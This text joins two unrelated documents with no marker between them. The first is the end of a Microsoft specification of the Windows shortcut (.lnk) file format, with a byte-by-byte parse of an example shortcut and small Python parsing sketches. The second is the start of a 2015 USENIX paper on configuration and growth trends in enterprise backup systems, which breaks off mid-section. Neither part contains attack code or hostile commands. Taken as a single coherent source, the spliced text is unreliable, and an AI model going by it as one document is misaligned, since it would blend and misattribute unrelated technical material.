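        "has_target_idlist": bool(link_flags & 0x00000001),
        "has_link_info": bool(link_flags & 0x00000002),
    }
```

Run against the first 0x4C bytes of the hexadecimal dump, this reproduces the values listed above: LinkFlags 0x0008009B, FileAttributes 0x00000020, ShowCommand 1.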
IDList: (189 bytes, offset 0x004E), an IDList structure (section 2.2.1) follows:
ItemIDList: (187 bytes, offset 0x004E), ItemID structures (section 2.2.2) follow:
ItemIDSize: (2 bytes, offset 0x004E), 0x0014.
Data: (18 bytes, offset 0x0050), <18 bytes of data> [computer]
ItemIDSize: (2 bytes, offset 0x0062), 0x0019.
Data: (23 bytes, offset 0x0064), <23 bytes of data> [c:]
ItemIDSize: (2 bytes, offset 0x007B), 0x0046.
Data: (68 bytes, offset 0x007D), <68 bytes of data> [test]
ItemIDSize: (2 bytes, offset 0x00C1), 0x0048.
Data: (70 bytes, offset 0x00C3), <70 bytes of data> [a.txt]
TerminalID: (2 bytes, offset 0x0109), 0x0000, indicates the end of the IDList.

Because HasLinkInfo is set, a LinkInfo structure (section 2.3) follows:

LinkInfoSize: (4 bytes, offset 0x010B), 0x0000003C.
LinkInfoHeaderSize: (4 bytes, offset 0x010F), 0x0000001C, as specified in the LinkInfo structure definition.
LinkInfoFlags: (4 bytes, offset 0x0113), 0x00000001, VolumeIDAndLocalBasePath is set.
VolumeIDOffset: (4 bytes, offset 0x0117), 0x0000001C, references offset 0x0127.
LocalBasePathOffset: (4 bytes, offset 0x011B), 0x0000002D, references the character string "C:\test\a.txt".
CommonNetworkRelativeLinkOffset: (4 bytes, offset 0x011F), 0x00000000, indicates CommonNetworkRelativeLink is not present.
CommonPathSuffixOffset: (4 bytes, offset 0x0123), 0x0000003B, references offset 0x00000146, the character string "" (empty string).
VolumeID: (17 bytes, offset 0x0127), because VolumeIDAndLocalBasePath is set, a VolumeID structure (section 2.3.1) follows:
VolumeIDSize: (4 bytes, offset 0x0127), 0x00000011, indicates the size of the VolumeID structure.
DriveType: (4 bytes, offset 0x012B), DRIVE_FIXED(3).
DriveSerialNumber: (4 bytes, offset 0x012F), 0x307A8A81.
VolumeLabelOffset: (4 bytes, offset 0x0133), 0x00000010, indicates that VolumeLabelOffsetUnicode is not specified, and references offset 0x0137, where the volume label is stored.
Data: (1 byte, offset 0x0137), "", an empty character string.
LocalBasePath: (14 bytes, offset 0x0138), because VolumeIDAndLocalBasePath is set, the character string "c:\test\a.txt" is present.
CommonPathSuffix: (1 byte, offset 0x0146), "", an empty character string.

Because HasRelativePath is set, the RELATIVE_PATH StringData structure (section 2.4) follows:

CountCharacters: (2 bytes, offset 0x0147), 0x0007 Unicode characters.
String: (14 bytes, offset 0x0149), the Unicode string ".\a.txt".

Because HasWorkingDir is set, the WORKING_DIR StringData structure (section 2.4) follows:

CountCharacters: (2 bytes, offset 0x0157), 0x0007 Unicode characters.
String: (14 bytes, offset 0x0159), the Unicode string "c:\test".

Extra data section: (100 bytes, offset 0x0167), an ExtraData structure (section 2.5) follows:

ExtraDataBlock: (96 bytes, offset 0x0167), the TrackerDataBlock structure (section 2.5.10) follows:
BlockSize: (4 bytes, offset 0x0167), 0x00000060.
BlockSignature: (4 bytes, offset 0x016B), 0xA0000003, which identifies the TrackerDataBlock structure (section 2.5.10).
Length: (4 bytes, offset 0x016F), 0x00000058, the required minimum size of this extra data block.
Version: (4 bytes, offset 0x0173), 0x00000000, the required version.
MachineID: (16 bytes, offset 0x0177), the character string "chris-xps", with zero fill.
Droid: (32 bytes, offset 0x0187), 2 GUID values.
DroidBirth: (32 bytes, offset 0x01A7), 2 GUID values.
TerminalBlock: (4 bytes, offset 0x01C7), 0x00000000, indicates the end of the extra data section.
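The size-prefixed layout of the extra data section lends itself to a simple cursor loop. The following sketch is illustrative only and handles none of the per-block semantics: it walks ExtraDataBlock structures by their BlockSize until a terminal block with size < 4 is reached, as described above. The input blob is synthetic, shaped like a minimal TrackerDataBlock, not the example bytes.

```python
import struct

def extra_data_blocks(buf, offset=0):
    """Collect (BlockSignature, body) pairs from an ExtraData section.

    A BlockSize value smaller than 0x00000004 marks the TerminalBlock
    (section 2.5), which ends the iteration."""
    blocks = []
    while offset + 4 <= len(buf):
        size, = struct.unpack_from("<I", buf, offset)
        if size < 4:                      # TerminalBlock reached
            break
        sig, = struct.unpack_from("<I", buf, offset + 4)
        blocks.append((sig, buf[offset + 8: offset + size]))
        offset += size
    return blocks

# Synthetic section: one 16-byte block carrying the TrackerDataBlock
# signature (0xA0000003), followed by a TerminalBlock of zero.
blob = struct.pack("<II8s", 16, 0xA0000003, b"payload!") + struct.pack("<I", 0)
assert extra_data_blocks(blob) == [(0xA0000003, b"payload!")]
```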
4 Security

None.

5 Appendix A: Product Behavior

The information in this specification is applicable to the following Microsoft products:

- Microsoft Windows NT® 3.1 operating system
- Microsoft Windows NT® 3.5 operating system
- Microsoft Windows NT® 3.51 operating system
- Microsoft Windows NT® 4.0 operating system
- Microsoft Windows® 2000 operating system
- Windows® XP operating system
- Windows Server® 2003 operating system
- Windows Vista® operating system
- Windows Server® 2008 operating system
- Windows® 7 operating system
- Windows Server® 2008 R2 operating system

Exceptions, if any, are noted below. If a service pack number appears with the product version, behavior changed in that service pack. The new behavior also applies to subsequent service packs of the product unless otherwise specified.

Unless otherwise specified, any statement of optional behavior in this specification prescribed using the terms SHOULD or SHOULD NOT implies product behavior in accordance with the SHOULD or SHOULD NOT prescription. Unless otherwise specified, the term MAY implies that the product does not follow the prescription.

<1> Section 2.3: In Windows, Unicode characters are stored in this structure if the data cannot be represented as ANSI characters due to truncation of the values. In this case, the value of the LinkInfoHeaderSize field is greater than or equal to 36.

<2> Section 2.5.1: In Windows environments, this is commonly known as a "command prompt" window.

<3> Section 2.5.2: In Windows environments, this is commonly known as a "command prompt" window.

<4> Section 2.5.3: In Windows, this is a Windows Installer (MSI) application descriptor. For more information, see [MSDN-MSISHORTCUTS].
<5> Section 2.5.11: The VistaAndAboveIDListDataBlock structure is supported on Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2 only.

6 Change Tracking

This section identifies changes made to [MS-SHLLINK] protocol documentation between the April 2010 and June 2010 releases. Changes are classed as major, minor, or editorial.

Major changes affect protocol interoperability or implementation. Examples of major changes are:

- A document revision that incorporates changes to interoperability requirements or functionality.
- An extensive rewrite, addition, or deletion of major portions of content.
- A protocol is deprecated.
- The removal of a document from the documentation set.
- Changes made for template compliance.

Minor changes do not affect protocol interoperability or implementation. Examples are updates to fix technical accuracy or ambiguity at the sentence, paragraph, or table level.

Editorial changes apply to grammatical, formatting, and style issues.

No changes means that the document is identical to its last release.

Major and minor changes can be described further using the following revision types:

- New content added.
- Content updated.
- Content removed.
- New product behavior note added.
- Product behavior note updated.
- Product behavior note removed.
- New protocol syntax added.
- Protocol syntax updated.
- Protocol syntax removed.
- New content added due to protocol revision.
- Content updated due to protocol revision.
- Content removed due to protocol revision.
- New protocol syntax added due to protocol revision.
- Protocol syntax updated due to protocol revision.
- Protocol syntax removed due to protocol revision.
- New content added for template compliance.
- Content updated for template compliance.
- Content removed for template compliance.
- Obsolete document removed.

Editorial changes always have the revision type "Editorially updated."

Some important terms used in revision type descriptions are defined as follows:

Protocol syntax refers to data elements (such as packets, structures, enumerations, and methods) as well as interfaces.

Protocol revision refers to changes made to a protocol that affect the bits that are sent over the wire.

Changes are listed in the following table. If you need further information, please contact protocol@microsoft.com.

Section | Tracking number (if applicable) and description | Major change (Y or N) | Revision type
2.3 LinkInfo | Replaced the term "ANSI" with "system default code page". | N | Editorially updated.
2.3.1 VolumeID | Replaced the term "ANSI" with "system default code page". | N | Editorially updated.
2.3.2 CommonNetworkRelativeLink | Replaced the term "ANSI" with "system default code page". | N | Editorially updated.
2.4 StringData | Replaced the term "ANSI" with "system default code page". | N | Editorially updated.
2.5.3 DarwinDataBlock | Replaced the term "ANSI" with "system default code page". | N | Editorially updated.
2.5.4 EnvironmentVariableDataBlock | Replaced the term "ANSI" with "system default code page". | N | Editorially updated.
2.5.5 IconEnvironmentDataBlock | Replaced the term "ANSI" with "system default code page". | N | Editorially updated.
2.5.10 TrackerDataBlock | Replaced the term "ANSI" with "system default code page". | N | Editorially updated.
3.1 Shortcut to a File | Replaced the term "ANSI" with "system default code page". | N | Editorially updated.
4 Security | Added section. | N | New content added for template compliance.
7 Index

Applicability 7
Change tracking 50
CommonNetworkRelativeLink packet 23
ConsoleDataBlock packet 29
ConsoleFEDataBlock packet 33
DarwinDataBlock packet 34
EnvironmentVariableDataBlock packet 35
Example - shortcut to file 44
ExtraData packet 27
Fields - vendor-extensible 7
FileAttributeFlags packet 12
Glossary 4
HotKeyFlags packet 13
IconEnvironmentDataBlock packet 37
IDList packet 17
Informative references 5
Introduction 4
ItemID packet 18
KnownFolderDataBlock packet 38
LinkFlags packet 10
LinkInfo packet 18
LinkTargetIDList packet 17
Localization 7
Normative references 5
Overview (synopsis) 6
Product behavior 49
PropertyStoreDataBlock packet 39
References - informative 5, normative 5
Relationship to protocols and other structures 6
Security 48
ShellLinkHeader packet 8
ShimDataBlock packet 39
Shortcut to file example 44
SpecialFolderDataBlock packet 40
StringData packet 26
Structures 8
TrackerDataBlock packet 40
Tracking changes 50
Vendor-extensible fields 7
Versioning 7
VistaAndAboveIDListDataBlock packet 42
VolumeID packet 21

This paper is included in the Proceedings of the 2015 USENIX Annual Technical Conference (USENIX ATC '15), July 8-10, 2015, Santa Clara, CA, USA. ISBN 978-1-931971-225. Open access to the Proceedings of the 2015 USENIX Annual Technical Conference (USENIX ATC '15) is sponsored by USENIX.
https://www.usenix.org/conference/atc15/technical-session/presentation/amvrosiadis

Identifying Trends in Enterprise Data Protection Systems

George Amvrosiadis, University of Toronto; Medha Bhadkamkar, Symantec Research Labs

George Amvrosiadis, Dept.
of Computer Science, University of Toronto (gamvrosi@cs.toronto.edu); Medha Bhadkamkar, Symantec Research Labs (medha_bhadkamkar@symantec.com)

Abstract

Enterprises routinely use data protection techniques to achieve business continuity in the event of failures. To ensure that backup and recovery goals are met in the face of the steep data growth rates of modern workloads, data protection systems need to constantly evolve. Recent studies show that these systems routinely miss their goals today. However, there is little work in the literature to understand why this is the case.

In this paper, we present a study of 40,000 enterprise data protection systems deploying Symantec NetBackup, a commercial backup product. In total, we analyze over a million weekly reports which have been collected over a period of three years. We discover that the main reason behind inefficiencies in data protection systems is misconfigurations. Furthermore, our analysis shows that these systems grow in bursts, leaving clients unprotected at times, and are often configured using the default parameter values. As a result, we believe there is potential in developing automated, self-healing data protection systems that achieve higher efficiency standards. To aid researchers in the development of such systems, we use our dataset to identify trends characterizing data protection systems with regards to configuration, job scheduling, and data growth.

1 Introduction

Studies analyzing the characteristics of storage systems are an important aid in the design and implementation of techniques that can improve the performance and robustness of these systems. In the past 30 years, numerous file system studies have investigated different aspects of desktop and enterprise systems [2, 6, 7, 19, 30, 39, 47, 51, 55, 56].
However, little work has been published to provide insight into the characteristics of backup systems, with existing studies focusing on deduplication rates [52] and on the characteristics of the file systems storing the backup images [66]. With this study, we look into the backup application generating these images, their internal structure, and the characteristics of the jobs that created them.

Modern data growth rates and shorter recovery windows are driving the need for innovation in the area of data protection. Recent surveys of CIOs and IT professionals indicate that 90% of businesses use more than two backup products [18], and only 28% of backup jobs complete within their scheduled window [34, 65]. The goal of this study is to investigate how data protection systems are configured and operate. Our analysis shows that the inefficiency of backup systems is largely attributed to misconfigurations. We believe automating configuration management can help alleviate these configuration issues significantly. Our findings motivate and support research on automated data protection [22, 27], by identifying trends in data protection systems, and related directions for future research.

Our study is based on a million weekly reports collected in a span of three years, from 40,000 enterprise backup systems, also referred to as domains in the rest of the paper. Each domain is a multi-tiered network of backup servers deploying Symantec NetBackup [61], an enterprise backup product. To the best of our knowledge, this dataset is the largest in existing literature in terms of both the number of domains, and the time span covered. As a result, we are able to analyze the characteristics of a diverse domain population, and its evolution over time.

First, we investigate how backup domains are configured. Identifying common growth trends is useful for provisioning system resources, such as network or storage bandwidth, to accommodate future growth.
We find that the population of protected client machines grows in bursts and rarely shrinks. Furthermore, domains protect data of a single type, such as database files or virtual machines, regardless of domain size. Overall, our findings suggest that automated configuration is an important and feasible direction for future research to accommodate growth bursts in the number of protected clients.

The configuration of a backup system, with regards to job frequency and scheduling, is also an important contributor to resource consumption. Understanding common practices employed by systems in the field can give us better insight in the load that these systems face, and the characteristics of that load. To derive these trends, we analyzed 210 million jobs performing a variety of tasks, ranging from data backup and recovery, to management of backup archives. We find that jobs occur in bursts, due to the preference of default scheduling parameters by users. Moreover, job types are strongly correlated to specific days and times of the week. To avoid these bursts of activity, we expect future backup systems to follow more flexible scheduling plans based on data protection guarantees and resource availability [4, 26, 48].

Finally, successful resource provisioning for backup storage capacity requires data growth rate knowledge. Our results show that jobs in the order of tens of GBs are the norm, even with deduplication ratios of 88%. Also, retention periods for these jobs are selected as a function of backup frequency, and backups are performed at intervals significantly shorter than the periods for which they are retained. Thus, future data protection offering faster backup and recovery times through the use of snapshots [1, 22], will have to be designed to handle significant data churn, or employ these mechanisms selectively.

We summarize the most important observations of our study in Table 1. Note that a policy (see Section 2.2) refers to a predefined set of configuration parameters specific to an application.

Characteristic | Observation | Section | Previous work
System setup | The initial configuration period of backup domains is at least 3 weeks. | 4.1 | None
Protected clients | Clients tend to be added to a domain in groups, on a monthly basis. | 4.2 | None
Backup policies | 82% of backup domains protect one type of data. | 4.3 | None
Backup policies | The number of backup job policies in a domain remains mostly fixed. Also, 79% of clients subscribe to a single policy. | 4.4 | None
Job frequency | Full backups tend to occur every few days, while incremental ones occur daily. Recovery operations occur for few domains, on a weekly or monthly basis. | 5.2 | None
Job frequency | Users prefer default scheduling windows during weekdays, resulting in nightly bursts of activity. | 5.3 | None
Job sizes | Incremental and full backups tend to be similar to each other in terms of size and number of files. Recovery jobs restore either few files and bytes, or entire volumes. | 6.1 | Considers file sizes instead [66]
Deduplication ratios | Deduplication can result in the reduction of backup image sizes by more than 88%, despite average job sizes ranging in the tens of gigabytes. | 6.2 | We confirm their findings [66]
Data retention | Incremental backups are retained for weeks, while full backups are retained for months, and retention depends on their scheduling frequency. | 6.3 | We confirm their findings [66]

Table 1: A summary of the most important observations of our study.

The rest of the paper is organized as follows. In Section 2, we provide an overview of the evolution of backup systems. Section 3 describes the dataset used in this study.
Sections 4 through 6 present our analysis results on backup domain configuration, job scheduling, and data growth, respectively. Finally, we discuss directions for research on next-generation data protection systems, supported by our findings, in Section 7, and conclude in Section 8.

2 Background

Formally, backup is the process of making redundant copies of data, so that it can be retrieved if the original copy becomes unavailable. In the past 30 years, however, data growth coupled with capacity and bandwidth limitations have triggered a number of paradigm shifts in the way backup is performed. Recently, data growth trends have once again prompted efforts to rethink backup [1, 9, 20, 22, 27]. This section underlines the importance of field studies in this process (Section 2.1), putting our study in context, and describes the architecture of modern backup systems (Section 2.2).

2.1 Evolution of backup and field studies

In the early 1990s, backup consisted of using simple command-line tools to copy data to/from tape. A number of studies tested and outlined the shortcomings of these contemporary backup methods [38, 54, 69, 70]. The limitations of this approach, which included scaling, archive management, operating on online systems, and completion time, were subsequently addressed sufficiently by moving to a client-server backup model [8, 11, 15, 16]. In this model, job scheduling, policy configuration, and archive cataloging were all unified at the server side.

In the early 2000s, deduplicating storage systems were developed [53, 67], which removed data redundancy, lowering the cost of backup storage. Subsequently, Wallace et al. [66] published a study that aims to characterize backup storage characteristics by looking at the contents and workload of file systems that store images produced by backup applications such as NetBackup.
A large body of work used their results to simulate deduplicating backup systems more realistically [41, 43, 44, 57, 62], and was built on the motivation provided by the study's results [40, 42, 46, 58]. The authors analyze weekly reports from appliances, while we analyze reports from the backup application, which has visibility within the archives and the jobs that created them. However, the two studies overlap in three points. First, the deduplication ratios reported for backups confirm our findings. Second, we report backup data retention as a configuration parameter, while they report on file age, two distributions that overlap for popular values. Third, the average job sizes we report are 5-8 times smaller than the file sizes reported in their study, likely because they take into account all files in the file system storing the backup images. Overlaps between our study and previous work are summarized in Table 1.

Figure 1: Architecture of a modern backup domain. (a) 3-tier architecture: a master server (tier one: media management, job scheduling, backup policies, catalog metadata), storage servers (tier two: data management), and clients (tier three). (b) 2-tier architecture: a master server (tier one: data/media management, job scheduling, backup policies, catalog metadata) with a fast storage interface to backup storage, and clients (tier two).

Recently, an ongoing effort has been initiated in the industry to redefine enterprise data protection as a response to modern data growth rates and shorter backup windows [12, 18, 65]. Proposed deviations from the traditional model rely on data snapshots, trading management complexity for faster job completion rates [22], and a paradigm shift from backup to data protection policies, in which users specify constraints on data availability as opposed to backup frequency and scheduling [1].
The latter paradigm allows the system to make decisions on individual policy parameters that can increase global efficiency, while keeping misconfigurations to a minimum. In this direction, previous work leverages predictive analytics to configure backup systems [9, 20, 25]. We believe that all this work is promising, and that a study characterizing the configuration and evolution of backup systems over time could aid in developing new approaches and predictive models that ensure backup systems meet their goals timely, while efficiently utilizing their resources.

2.2 Anatomy of modern backup systems

Modern backup domains typically consist of three tiers of operation: a master server, one or more storage servers, and several clients, as shown in Figure 1a. The domain's master server maintains information on backup images and backup policies. It is also responsible for scheduling and monitoring backup jobs, and assigning them to storage servers. Storage servers manage storage media, such as tapes and hard drives, used to archive backup images. By abstracting storage media management in this way, clients can send data directly to their corresponding storage server, avoiding a bandwidth bottleneck at the master server. Finally, domain clients can be desktops, servers, or virtual machines generating data that is protected by the backup system against failures. In an alternative 2-tiered architecture model (Figure 1b), the storage servers are absent and the storage media are directly managed by the master server. The majority of enterprise backup software today, including Symantec NetBackup, supports the 3-tiered model [3, 5, 13, 17, 21, 28, 32, 60, 68].

Performing a backup generally consists of a sequence of operations, each of which is executed as an independent job.
Such jobs include: snapshots of the state of data at a given point in time, copying data into a backup image as part of a full backup, copying modified data since the last backup as part of an incremental backup, restoring data from a backup image as part of a recovery operation, and managing backup images or backing up the domain's configuration as part of a management operation. These jobs are typically employed in a predefined order. For example, a full backup may be followed by a management operation that deletes backup images past their retention periods.

To be consistently backed up, or provide point-in-time recovery guarantees, business applications may require specific operations to take place. In these scenarios, backup products offer predefined policies that are specific to individual applications. For instance, a Microsoft Exchange Server policy will also back up the transaction log, to capture any updates since the backup was initiated. Users can further configure policies to specify the characteristics of backup jobs, such as their frequency and retention rate.

3 Dataset Information

Our analysis is based on telemetry reports collected from customer installations of a commercial backup product, Symantec NetBackup [61], in enterprise and regular production environments. Reports are only collected from customers who opted to participate in the telemetry program, so our dataset represents a fraction of the customer base. The reports contain no personal identifiable information, or details about the data being backed up.

Report types. Each report in our dataset belongs to exactly one of three types: installation, runtime, or domain report. Reports of different types are collected at distinct points in the lifetime of a backup domain.
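The predefined job ordering and per-policy parameters described in Section 2.2 can be sketched roughly as follows. The field names and the scheduling rule are hypothetical illustrations, not NetBackup's actual configuration schema.

```python
from dataclasses import dataclass

@dataclass
class BackupPolicy:
    # Illustrative parameters only; real products expose far more knobs.
    name: str
    policy_type: str             # e.g. "MS-Exchange-Server", "VMware"
    full_every_days: int = 7     # full backup frequency
    incr_every_days: int = 1     # incremental backup frequency
    retention_days: int = 30     # how long backup images are kept

def jobs_for(policy, day):
    """Return the day's ordered job sequence: a full backup is followed
    by a management job that expires images past their retention."""
    if day % policy.full_every_days == 0:
        return ["snapshot", "full_backup", "expire_old_images"]
    if day % policy.incr_every_days == 0:
        return ["snapshot", "incremental_backup"]
    return []

p = BackupPolicy("exchange-prod", "MS-Exchange-Server")
assert jobs_for(p, 14) == ["snapshot", "full_backup", "expire_old_images"]
assert jobs_for(p, 15) == ["snapshot", "incremental_backup"]
```

The point of the sketch is the ordering constraint: the management job always trails the full backup, mirroring the example in the text.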
Installation reports are generated when the backup software is successfully installed on a server, and can be used to determine the time each server of a domain first came online. Runtime reports are generated and transmitted on a weekly basis from online domains, and contain daily aggregate data about the backup jobs running on the system. Domain reports are also generated and transmitted on a weekly basis, and report daily aggregate metrics that describe the configuration of the backup domain. The telemetry report metrics used in this study are summarized in Table 2.

Report type | Metrics used in study
Installation | Installation time
Runtime report | Job information: starting time, type, size, number of files, client policy, deduplication ratio, retention period
Domain report | Number and type of policies, number of clients, number of storage media, number of storage servers and appliances

Table 2: Telemetry report metrics used in the study.

Dataset size. The telemetry reports in our dataset were collected over the span of 3 years (January 2012 to December 2014), across two major versions of the NetBackup software. We collected 1 million reports from over 40,000 server installations deployed in 124 countries, on most modern operating systems.

Monitoring duration. The backup domains included in our study were each monitored for 5.5 months on average, and up to 32 months. We elaborate on our strategy for excluding some of the domains from our analysis in Section 4.1. Note that the monitoring time is not always equivalent to the total lifetime of the domain, as many of these domains were still online at the time of this writing.

Architecture. While NetBackup supports the 3-tiered architecture model, only 35% of domains in our dataset use dedicated storage servers. The remaining domains omit that layer, opting for a 2-tier system instead.
Additionally, while backup software can be installed on any server, storage companies also offer Purpose-Built Backup Appliances (PBBAs) [33]. 31% of domains in our dataset represent this market by deploying NetBackup on Symantec PBBAs.

4 Domain configuration

This section analyzes the way backup domains are configured with regards to their clients and backup policies. We use the periodic telemetry reports to quantify the growth rate of the number of clients and policies across domains, and characterize the diversity of policy types based on the type of data and applications they protect.

Figure 2: The average number of clients, policies, and storage media for a given week of operation, as a fraction of the expected total, i.e. the overall mean. We begin our analysis on the fourth week of operation, when these quantities become relatively stable.

4.1 Initial configuration period

Observation 1: Backup domains take at least 3 weeks to reach a stable configuration after installation.

The number of clients, policies, and storage media are three characteristic factors of a backup domain's configuration. These numbers fluctuate as resources are added to, or removed from the domain. As we monitor domains since their creation, we find the number of clients, policies, and storage media to be initially close to zero, and then increase rapidly until the domain is properly configured. After this initial configuration period, variability for these numbers tends to be low over the lifetime of each domain, with standard deviations less than 16% of the corresponding mean.

To avoid having the initial weeks of operation affect our results, we exclude them from our analysis.
To estimate the average configuration period length, we analyze the number of clients, policies, and storage media in a backup domain as a fraction of the overall mean, i.e. the expected total. In Figure 2, we report the average fractions for all domains that have been monitored for more than 16 weeks. For example, a fraction of 0.47 for the number of clients during the first week of operation implies that the number of clients at that time is 47% of the domain's expected total. With the exception of storage media, which seem to be added to backup domains from their first week of operation, we find that the number of clients and policies tends to be significantly lower for the first 3 weeks of operation. As a result, we choose to start our analysis from the fourth week of operation.

4.2 Client growth rate

Observation 2: The number of clients in a domain increases by an average of 7 clients every 3.7 months.

Figure 3: Distribution of the average rate at which the number of clients changes, across all domains in our dataset (median: 1.3 months; mean: 3.7 months). On average, 93% of client population changes are attributed to the addition of clients.

Clients are the producers of backup data, and the consumers of said data during recovery. As a result, the number of jobs running on a backup domain is directly proportional to the number of clients in the domain, deeming it important to quantify the rate at which their population grows over time.

Once the initial configuration period for a backup domain has elapsed, we find that clients tend to be added to, or removed from the domain in groups.
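The fraction-of-expected-total normalization behind Figure 2 can be sketched as below. The weekly counts are made-up, and the overall mean stands in for the "expected total" exactly as in the text.

```python
from statistics import mean

def fraction_of_expected(weekly_counts):
    """Express each week's count as a fraction of the overall mean,
    the 'expected total' used for Figure 2."""
    expected = mean(weekly_counts)
    return [c / expected for c in weekly_counts]

# Toy domain: roughly 3 weeks of ramp-up, then a stable client population.
counts = [47, 70, 90, 100, 100, 100, 100, 100]
fracs = fraction_of_expected(counts)
assert fracs[0] < 0.6                    # early weeks well below the mean
assert all(f > 0.9 for f in fracs[3:])   # stable from the fourth week on
```

Dropping the first few weeks before computing per-domain statistics, as the paper does, prevents this ramp-up from skewing the averages.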
Therefore, we characterize a domain's client population growth by quantifying the average rate of change in the client population, the sign indicating an increase or decrease in the population, and the size of each change.

To estimate the rate at which the number of clients changes, we extract inter-arrival times between changes through change-point analysis [37], a cost-benefit approach for detecting changes in time series. Then, we estimate the average rate of change for a domain as the average of these inter-arrival times. In Figure 3, we show the distribution of the average rates of change, i.e. the average number of months between changes in the number of clients across domains. For 42% of backup domains, the number of clients remains fixed after the first 3 weeks of operation, while on average the number of clients in a domain changes every 3.7 months. Overall, we find no strong correlation between the rate of change in the number of clients, and the domain's lifetime.

We further analyze the sign and size of each population change. Of all events in which a domain's client population changes, 93% are attributed to the addition of clients. However, 78% of domains never remove clients. Regarding the size of each change, Figure 4 shows the distribution of the average number of clients involved in each change, across all domains in our study. On average, a domain's population changes by 7.3 clients at a time. The average standard deviation of the number of clients over time is 13.1% of the corresponding expected value, indicating low variation overall. However, the 95% confidence intervals (C.I.) for each mean (Figure 4) suggest that growth spurts as large as 2.16 times the average value are possible, as this is the width of the average 95% confidence interval.

Figure 4: Distribution of the average number of clients involved in each change of a domain's client population, across all domains in our dataset (median: 3.0 clients; mean: 7.3 clients). The 95% confidence intervals (C.I.) for each domain's average are also shown.

Policy category          Domains with at least 1 policy
File and block policy    61.24%
Database policy          20.34%
Virtual machine policy   15.13%
Application policy       13.52%
Metadata backup policy   31.93%

Table 3: Percentage of backup domains with at least one policy of a given category. Less than a third of domains protect the master server using a metadata backup policy.

4.3 Diversity of protected data

Observation 3: 82% of backup domains protect one type of data, and only 32% of domains effectively protect the master server's state and metadata.

To provide consistent online backups, backup products offer optimizations for different application types, implemented as dedicated policy types [14, 23, 59]. For our analysis, we partitioned these policy types into four categories. File and block policies are specifically tailored for backing up raw device data blocks, or file and operating system data and metadata, e.g. from NTFS, AFS, or Windows volumes. Database policies are designed to provide consistent online backups for specific database management systems, such as DB2 and Oracle. Virtual machine policies are tuned to back up and restore VM images, from virtual environments such as VMware or Hyper-V. Application policies specialize in backing up state for client-server applications, such as Microsoft Exchange and Lotus Notes. Finally, a metadata backup policy can be set up to back up the master server's state.

In Table 3, we show the probability that at least one policy of a given category will be present in a backup domain. Since domains may deploy policies from multiple categories, these percentages add up to more than 100%.
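The per-category prevalence computation behind Table 3 can be sketched as follows; the domain-to-category mapping is hypothetical, and because a domain can count toward several categories, the percentages may sum past 100%.

```python
def category_prevalence(domain_policies):
    """For each policy category, the percentage of domains with at
    least one policy of that category (as in Table 3)."""
    categories = {c for cats in domain_policies.values() for c in cats}
    total = len(domain_policies)
    return {c: 100.0 * sum(1 for cats in domain_policies.values() if c in cats) / total
            for c in sorted(categories)}

# Hypothetical domains and the policy categories they deploy.
domains = {
    "d1": {"file"},
    "d2": {"file", "database"},
    "d3": {"file", "vm"},
    "d4": {"database"},
}
print(category_prevalence(domains))
```

For this toy input, "file" appears in 3 of 4 domains (75%) and the percentages total 150%, illustrating why the Table 3 column exceeds 100%.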
Figure 5: Distribution of the number of policy categories per backup domain: one category 82.21%, two 15.82%, three 1.72%, four 0.26%. The metadata backup policy category is not accounted for in these numbers.

Figure 6: Distribution of the number of policy types per backup domain, across all domains in the study (median: 1.9 policy types; mean: 2.6 policy types). More than 25 distinct NetBackup policy types are present in the telemetry data.

Surprisingly, we find that only 32% of backup domains register a metadata backup policy to protect the master server's data. While the remaining domains may employ a different mechanism to back up the master server, guaranteeing no data inconsistencies while doing so is challenging. In any case, this result suggests that automatically configured metadata backup policies should be a priority for future backup systems.

We also look into the number of policy categories represented by each domain's policies, to gauge the diversity in the types of protected data. Interestingly, Figure 5 shows that 82% of domains deploy policies of a single category (excluding metadata backup policies), and the remaining domains mostly use policies of two distinct categories. We further examine the number of distinct policy types that are deployed in each domain. As shown in Figure 6, domains tend to make use of a small number of policy types. Specifically, 61% of the domains deploy policies of only one or two distinct types.
4.4 Backup policies

Observation 4: After the initial configuration period, the number of policies in a domain remains mostly fixed, and 79% of clients subscribe to a single policy each.

Figure 7: Distribution of the average number of policies per backup domain (median: 7.0 policies; mean: 30.1 policies). The 95% confidence intervals for each average are also shown. Overall, the number of policies remains stable over the lifetime of a domain.

Following from Section 4.2, the policies in a backup domain, along with the number of clients, are indicative of the domain's load. Recall from Section 2.2 that clients subscribe to policies, which determine the characteristics of backup jobs. Therefore, it is important to quantify both the number of policies in a domain and the characteristics of each, to effectively characterize the domain's workload. We defer an analysis of job characteristics to the remainder of the paper, and focus here on the number of policies in each domain.

In Figure 7, we show the distribution of the average number of policies in a given backup domain, across all domains in our dataset. Overall, we find that once the initial configuration period is complete, the number of backup policies in a domain remains mostly stable. Specifically, the expected width of the 95% confidence interval is 2.5% of the average number of policies. Figure 7 also shows that the average backup domain carries 30 backup policies, while 5% of domains carry over 128. While each policy may represent a group of clients with specific data protection needs, we find that individual clients usually subscribe to a single policy. In Figure 8, we show the distribution of the average number of policies that each client subscribes to.
More than 79% of clients belong to only one policy, while 16% spend some or most of their time unprotected (less than one policy on average). The latter result, coupled with the large number of policies in backup domains and the fact that clients are added to a domain in groups (Section 4.2), suggests that manual policy configuration might not be ideal as a domain's client population inflates over time.

5 Job scheduling

While the master server can reorder policy jobs to increase overall system efficiency, it adheres to user preferences that dictate when, and how often, a job should be scheduled. This section looks into the way that these parameters are configured by users across backup domains, and the workload generated in the domain as a result.

Figure 8: Distribution of the average number of policies that a domain client subscribes to (median: 1.0 policies; mean: 1.2 policies). Overall, 79% of clients subscribe to one policy, while 16% spend some or most time unprotected by a policy (x < 1).

Job type                 Percentage of jobs
Incremental Backups      45.27%
Full Backups             31.20%
Snapshot Operations      12.61%
Management Operations    10.12%
Recovery Operations       0.80%

Table 4: Breakdown of all jobs in the dataset by type.

5.1 Job types

Recall from Section 2.2 that policies consist of a predefined series of operations, each carried out by a separate job. We collected data from 209.5 million jobs, and we group them in five distinct categories: full and incremental backups, snapshots, recovery, and management operations. In Table 4, we show a breakdown of all jobs in our dataset by job type.
Across all monitored backup domains, we find that 76% of jobs perform data backups, having processed a total of 1.64 Exabytes of data, while 13% of jobs take snapshots of data. On the other hand, less than 1% of jobs are tasked with data recovery, having restored a total of 5.12 Petabytes of data. Finally, 10% of jobs are used to manage backup images, e.g. migrate, duplicate, or delete them. Due to the data transfer of backup images, these jobs processed 4.88 Exabytes of data. We analyze individual job sizes in Section 6.

5.2 Scheduling frequency

Observation 5: Full backups tend to occur every 5 days or fewer. Recovery operations occur for few domains, on a weekly or monthly basis.

